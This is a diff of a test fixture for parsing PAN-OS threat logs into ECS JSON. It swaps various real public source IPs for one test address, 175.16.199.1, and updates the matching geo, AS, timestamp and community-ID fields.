@@ -11316,15 +11315,15 @@ "picard" ], "ip": [ - "74.125.239.20", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545909107Z", - "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:36:04,74.125.239.20,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:36:09,21267,1,80,53809,0,0,0x200000,tcp,alert,\"nav_logo107.png\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079468600Z", + "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:36:04,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:36:09,21267,1,80,53809,0,0,0x200000,tcp,alert,\"nav_logo107.png\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:37.000-04:00", "timezone": "America/New_York", "kind": "alert", 
@@ -11361,25 +11360,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 14907, + "number": 4837, "organization": { - "name": "Wikimedia Foundation Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "208.80.154.225" + "ip": "175.16.199.1" }, - "message": "208.80.154.225,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:13,24567,1,80,55912,0,0,0x200000,tcp,alert,\"Eadweard_Muybridge\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:13,24567,1,80,55912,0,0,0x200000,tcp,alert,\"Eadweard_Muybridge\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -11420,7 +11421,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:W08oA4XVHxagaCryNLen9OoTnPk=", + "community_id": "1:VnAH7uRc/1Fo96KeI+gR6FdX/+4=", "transport": "tcp", "application": "web-browsing", "direction": "outbound" 
@@ -11455,15 +11456,15 @@ "picard" ], "ip": [ - "208.80.154.225", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545916266Z", - "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:08:08,208.80.154.225,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:13,24567,1,80,55912,0,0,0x200000,tcp,alert,\"Eadweard_Muybridge\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079472Z", + "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:08:08,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:13,24567,1,80,55912,0,0,0x200000,tcp,alert,\"Eadweard_Muybridge\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:37.000-04:00", "timezone": "America/New_York", "kind": "alert", 
@@ -11500,25 +11501,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 14907, + "number": 4837, "organization": { - "name": "Wikimedia Foundation Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "208.80.154.234" + "ip": "175.16.199.1" }, - "message": "208.80.154.234,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:49,24646,1,80,55916,0,0,0x200000,tcp,alert,\"load.php\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:49,24646,1,80,55916,0,0,0x200000,tcp,alert,\"load.php\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -11559,7 +11562,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:tvB7u/5+rW38IXXGXjbdYYdzJ5s=", + "community_id": "1:mDb1jYB7jLdLjgofpLkOZVSAbQo=", "transport": "tcp", "application": "web-browsing", "direction": "outbound" 
@@ -11594,15 +11597,15 @@ "picard" ], "ip": [ - "208.80.154.234", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545923391Z", - "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:08:44,208.80.154.234,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:49,24646,1,80,55916,0,0,0x200000,tcp,alert,\"load.php\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079476400Z", + "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:08:44,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:49,24646,1,80,55916,0,0,0x200000,tcp,alert,\"load.php\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:37.000-04:00", "timezone": "America/New_York", "kind": "alert", 
@@ -11639,28 +11642,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Los Angeles", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "California", + "region_name": "Jilin", "location": { - "lon": -118.244, - "lat": 34.0544 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 8075, + "number": 4837, "organization": { - "name": "Microsoft Corporation" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "65.54.75.25" + "ip": "175.16.199.1" }, - "message": "65.54.75.25,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:17:01,25874,1,80,1046,0,0,0x200000,tcp,reset-both,\"8fe44cb728c0f40750c64ee906eb72.css\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:17:01,25874,1,80,1046,0,0,0x200000,tcp,reset-both,\"8fe44cb728c0f40750c64ee906eb72.css\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -11701,7 +11703,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:LvKTW1EWi7nem/oAlX14Sg2W9kU=", + "community_id": "1:rI+JtLN1tgRFWLwW5eO/dAik6SY=", "transport": "tcp", "application": "web-browsing", "direction": "outbound" 
@@ -11736,15 +11738,15 @@ "jordy" ], "ip": [ - "65.54.75.25", + "175.16.199.1", "192.168.0.6", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545930700Z", - "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:16:57,65.54.75.25,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:17:01,25874,1,80,1046,0,0,0x200000,tcp,reset-both,\"8fe44cb728c0f40750c64ee906eb72.css\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079482300Z", + "original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:16:57,175.16.199.1,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:17:01,25874,1,80,1046,0,0,0x200000,tcp,reset-both,\"8fe44cb728c0f40750c64ee906eb72.css\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:37.000-04:00", "timezone": "America/New_York", "kind": "alert", 
@@ -11781,25 +11783,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "74.125.224.206" + "ip": "175.16.199.1" }, - "message": "74.125.224.206,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:06:46,2175,1,80,61734,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:06:46,2175,1,80,61734,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -11840,7 +11844,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:Iur0h7DmmxbVfmJ8EKqn0v73b88=", + "community_id": "1:h4FhwHd9ztu4jpl3xgOaiB011a4=", "transport": "tcp", "application": "google-maps", "direction": "outbound" 
@@ -11875,15 +11879,15 @@ "jordy" ], "ip": [ - "74.125.224.206", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545938030Z", - "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 04:06:41,74.125.224.206,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:06:46,2175,1,80,61734,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079488Z", + "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 04:06:41,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:06:46,2175,1,80,61734,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:42.000-04:00", "timezone": "America/New_York", "kind": "alert", 
@@ -11920,25 +11924,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "74.125.224.195" + "ip": "175.16.199.1" }, - "message": "74.125.224.195,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:12:57,3046,1,80,62292,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:12:57,3046,1,80,62292,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -11979,7 +11985,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:n3f9RX9U3DOM57vpn8aB1QSo2Yw=", + "community_id": "1:GSknwPhD0cMXgRXsuLSg5w0bq98=", "transport": "tcp", "application": "google-maps", "direction": "outbound" 
@@ -12014,15 +12020,15 @@ "jordy" ], "ip": [ - "74.125.224.195", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545945265Z", - "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 04:12:52,74.125.224.195,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:12:57,3046,1,80,62292,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079495700Z", + "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 04:12:52,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:12:57,3046,1,80,62292,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:42.000-04:00", "timezone": "America/New_York", "kind": "alert", 
@@ -12059,28 +12065,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-KS", - "city_name": "Liberal", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Kansas", + "region_name": "Jilin", "location": { - "lon": -100.9286, - "lat": 37.0438 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 20376, + "number": 4837, "organization": { - "name": "Hubris Communications" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "207.178.96.34" + "ip": "175.16.199.1" }, - "message": "207.178.96.34,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,rss,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:07:54,1560,1,80,64669,0,0,0x200000,tcp,alert,\"appcast.xml\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,rss,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:07:54,1560,1,80,64669,0,0,0x200000,tcp,alert,\"appcast.xml\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -12121,7 +12126,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:K6mY9EnrwYs1/a01d++OZ3kna2g=", + "community_id": "1:QRX5cQgXoEh4jqvb7ZLpI4VOhLc=", "transport": "tcp", "application": "rss", "direction": "outbound" 
@@ -12156,15 +12161,15 @@ "jordy" ], "ip": [ - "207.178.96.34", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545952458Z", - "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:07:49,207.178.96.34,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,rss,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:07:54,1560,1,80,64669,0,0,0x200000,tcp,alert,\"appcast.xml\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079501900Z", + "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:07:49,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,rss,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:07:54,1560,1,80,64669,0,0,0x200000,tcp,alert,\"appcast.xml\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:42.000-04:00", "timezone": "America/New_York", "kind": "alert", 
@@ -12201,25 +12206,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "74.125.224.195" + "ip": "175.16.199.1" }, - "message": "74.125.224.195,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:48:48,16852,1,80,65265,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:48:48,16852,1,80,65265,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -12260,7 +12267,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:u89cWOeFF4sWlYYJHVB+nr6g6Qg=", + "community_id": "1:nDUNBR/xYCMP799BdvaOhbJMzn0=", "transport": "tcp", "application": "google-maps", "direction": "outbound" 
@@ -12295,15 +12302,15 @@ "picard" ], "ip": [ - "74.125.224.195", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545959681Z", - "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:48:44,74.125.224.195,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:48:48,16852,1,80,65265,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079507600Z", + "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:48:44,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:48:48,16852,1,80,65265,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:42.000-04:00", "timezone": "America/New_York", "kind": "alert", 
@@ -12340,25 +12347,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "74.125.239.20" + "ip": "175.16.199.1" }, - "message": "74.125.239.20,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:49:05,15948,1,80,64979,0,0,0x200000,tcp,alert,\"csi\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:49:05,15948,1,80,64979,0,0,0x200000,tcp,alert,\"csi\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -12399,7 +12408,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:QmMWJ0pdk04yRgDj9m6OAKnXpDY=", + "community_id": "1:/XRD8fjQCZ2reh0gJyQK2rfs+Wc=", "transport": "tcp", "application": "web-browsing", "direction": "outbound" 
@@ -12434,15 +12443,15 @@ "picard" ], "ip": [ - "74.125.239.20", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545966773Z", - "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:48:59,74.125.239.20,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:49:05,15948,1,80,64979,0,0,0x200000,tcp,alert,\"csi\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079513200Z", + "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:48:59,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:49:05,15948,1,80,64979,0,0,0x200000,tcp,alert,\"csi\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:42.000-04:00", "timezone": "America/New_York", "kind": "alert", 
@@ -12479,28 +12488,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-NY", - "city_name": "Albany", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "New York", + "region_name": "Jilin", "location": { - "lon": -73.8601, - "lat": 42.7008 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 13536, + "number": 4837, "organization": { - "name": "First Light Fiber" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "66.152.109.24" + "ip": "175.16.199.1" }, - "message": "66.152.109.24,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:50:19,17028,1,80,49432,0,0,0x200000,tcp,alert,\"index.php\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:50:19,17028,1,80,49432,0,0,0x200000,tcp,alert,\"index.php\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -12541,7 +12549,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:d3Kvg96HWrCNAfAK3vx2Uqglkdo=", + "community_id": "1:ur+hejcekimZ+EBsduNmTAfLAKk=", "transport": "tcp", "application": "web-browsing", "direction": "outbound" 
@@ -12576,15 +12584,15 @@ "picard" ], "ip": [ - "66.152.109.24", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545973814Z", - "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:50:14,66.152.109.24,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:50:19,17028,1,80,49432,0,0,0x200000,tcp,alert,\"index.php\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079519200Z", + "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:50:14,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:50:19,17028,1,80,49432,0,0,0x200000,tcp,alert,\"index.php\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:42.000-04:00", "timezone": "America/New_York", "kind": "alert", 
@@ -12621,25 +12629,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "74.125.224.200" + "ip": "175.16.199.1" }, - "message": "74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:51:39,15878,1,80,49722,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:51:39,15878,1,80,49722,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -12680,7 +12690,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:+c2DVc+anjtRZ3iRsjbG51UM+JA=", + "community_id": "1:iVCt7y8n4xY4lxHpFzTmtUtGbGw=", "transport": "tcp", "application": "google-maps", "direction": "outbound" 
